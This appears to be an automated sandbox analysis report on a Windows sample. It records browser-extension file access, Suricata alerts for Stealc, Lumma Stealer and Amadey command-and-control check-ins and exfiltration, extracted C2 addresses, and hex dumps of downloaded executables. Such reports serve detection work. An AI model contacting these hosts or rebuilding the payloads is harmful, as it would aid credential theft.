Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 85c9ba9a2d.exe, 0000001E.00000003.2896719901.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, 85c9ba9a2d.exe, 0000001E.00000002.3030602387.0000000000F92000.00000040.00000001.01000000.00000011.sdmp, 85c9ba9a2d.exe, 00000020.00000002.3090281799.0000000000F92000.00000040.00000001.01000000.00000011.sdmp, 85c9ba9a2d.exe, 00000020.00000003.3049096078.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Directory queried: number of queries: 2044

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50120 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:61903 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:60463 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:59312 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:54467 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:52803 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:55647 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:50326 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50121
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50124 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50126 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50123 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50127 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50128 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50129 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50135 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50134 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50130 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50146 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50131 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50148 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:65292 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:61173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:53486 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:65154 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:52363 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:59595 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50150 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50152 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50153 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50151 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50160 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50155 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50162 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50159 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50157 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50164 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50144 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:64925 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:63653 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:64513 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:64007 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:49912 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50173 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50171 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50175 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50168 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50176 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50180 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:60714 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50178 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50184 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50182 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50181 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50124 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50124 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50126 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50126 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50134 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50152 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50152 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50164 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50150 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50150 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50173 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50173 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50135 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50162 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50171 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50171 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50180 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50181 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50184 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 09:33:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 09:33:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 09:33:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 